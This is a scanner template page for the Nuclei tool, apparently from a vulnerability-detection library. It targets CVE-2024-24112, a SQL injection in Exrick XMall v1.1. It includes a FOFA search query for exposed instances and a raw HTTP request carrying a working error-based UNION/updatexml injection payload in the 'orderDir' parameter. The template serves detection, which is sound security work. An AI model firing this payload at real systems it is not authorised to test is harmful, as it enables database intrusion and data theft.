Exrick XMall - SQL Injection
ID: CVE-2024-24112
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2024,xmall,sqli
Description
Section titled “Description”XMall v1.1 was discovered to contain a SQL injection vulnerability via the ‘orderDir’ parameter.
YAML Source
Section titled “YAML Source”id: CVE-2024-24112
info: name: Exrick XMall - SQL Injection author: DhiyaneshDk severity: critical description: | XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter. reference: - https://github.com/Exrick/xmall/issues/78 - https://nvd.nist.gov/vuln/detail/CVE-2024-24112 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-24112 cwe-id: CWE-89 epss-score: 0.00076 epss-percentile: 0.32712 cpe: cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: exrick product: xmall fofa-query: app="XMall-后台管理系统" tags: cve,cve2024,xmall,sqli
variables: num: "{{rand_int(9000000, 9999999)}}"
http: - raw: - | GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "{{md5(num)}}" - "MySQLSyntaxErrorException" condition: and
- type: status status: - 200# digest: 4b0a00483046022100c67c792cdc514c8c4bbc5b98b5abb7da5e7942eac3e3749eb4b914db853f41d7022100f8579df2ba02b9cb61fcb4f10875fa506dfd4bfec36eacf925914f8fa8905064:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-24112.yaml"